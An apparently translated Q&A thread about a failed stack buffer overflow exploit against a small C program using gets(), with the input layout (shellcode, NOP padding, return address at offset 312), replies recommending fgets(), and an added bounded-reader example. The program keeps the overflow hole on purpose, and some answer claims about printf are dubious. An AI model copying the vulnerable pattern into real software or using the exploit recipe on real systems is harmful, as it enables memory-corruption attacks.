2013-07-29 79 views
0

I get this error in Immunity Debugger: Immunity Debugger error: "Access violation when reading [90909090]"

Access violation when reading [90909090]

when I try to exploit a simple C program: I give it a long input that overwrites the return address, and when it jumps to the new return address and starts running my shellcode, I get the error.

This is my C code:

#include <stdio.h>

int main(int argc, char** argv)
{
    int cookie;
    char buffer[300];
    /* prints the buffer's address so a return address into it can be chosen */
    printf(" buffer : %08x\r\n",&buffer);
    /* gets() has no length limit: input longer than 300 bytes overwrites
       the stack, which is the overflow this question relies on */
    gets(buffer);
    return 0;
}

and this is my shellcode:


The shellcode is 224 bytes long and the return address is at offset 312, so my input has the following format:

shellcode+'\x90'*88+ReturnAddress 
+0

In your shellcode, I noticed a "missing" (,) in the middle of the second line. Is it supposed to be missing, or was it lost during copy/paste? I hope you don't mind me writing "Shell code" –

+0

Oh, if that error is present in the original code, I suspect it would cause problems. –

+0

@DavidRobertsson - As far as I can tell, the comma was removed by you by mistake: http://stackoverflow.com/posts/17923253/revisions I corrected it while approving the edit, and made a few changes. If I made a mistake, please let me know, or submit another edit. Thanks! – Kobi

Answer

2

The printf() statement in your code is wrong; the & is NOT needed:

printf(" buffer : %08x\r\n", &buffer);
                             ^ remove

Next, your char buffer[300]; holds garbage values; even if you remove the &, it leads to undefined behaviour.

Note: as David RF noted, you are using the deprecated gets(). You should use the char * fgets (char * str, int num, FILE * stream); function to avoid buffer overflow attacks.

btw, this is the first program that prints the buffer before reading from the user! (why so?)
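The answer above recommends fgets() in place of gets(); the following is an added example (not code from the question or the answer) of a bounded line reader that reports when a line did not fit and drains the overflowing input, with read_from_string as a hypothetical helper that feeds a constructed string through a temporary file so the program runs without interactive stdin.

```c
#include <stdio.h>
#include <string.h>

/* Bounded replacement for the gets() call in the question (added example).
 * Reads one line from `in` into buf (capacity n), strips the trailing
 * newline and, when the line did not fit, drains the rest of it so the
 * next read starts on a fresh line instead of the excess spilling over.
 * Returns 1 on success, 0 on EOF/error, -1 if the line was truncated. */
int read_line_bounded(char *buf, size_t n, FILE *in)
{
    if (n == 0 || fgets(buf, (int)n, in) == NULL) {
        if (n > 0) buf[0] = '\0';
        return 0;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 1;
    }
    /* No newline in buf: the line fit exactly, the file ended, or the
       line is longer than n-1 bytes. One more character tells which. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 1;
    while (c != EOF && c != '\n')   /* discard the rest of the long line */
        c = fgetc(in);
    return -1;
}

/* Demonstration helper (hypothetical): feeds a constructed string through
 * a temporary FILE* so the example can be exercised without stdin. */
int read_from_string(const char *input, char *buf, size_t n)
{
    FILE *f = tmpfile();
    if (f == NULL) return 0;
    fputs(input, f);
    rewind(f);
    int rc = read_line_bounded(buf, n, f);
    fclose(f);
    return rc;
}

int main(void)
{
    char buffer[300];
    printf("buffer : %p\n", (void *)buffer); /* %p, not "%08x" with &buffer */
    return read_line_bounded(buffer, sizeof buffer, stdin) < 0;
}
```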

+0

+1, also, it prints the value of an uninitialized buffer; it should be printed after 'gets' (deprecated, use 'fgets' instead) –

+0

Okay, thanks for your answer – Sani

+1

@DavidRF yes, an excellent point that I missed. –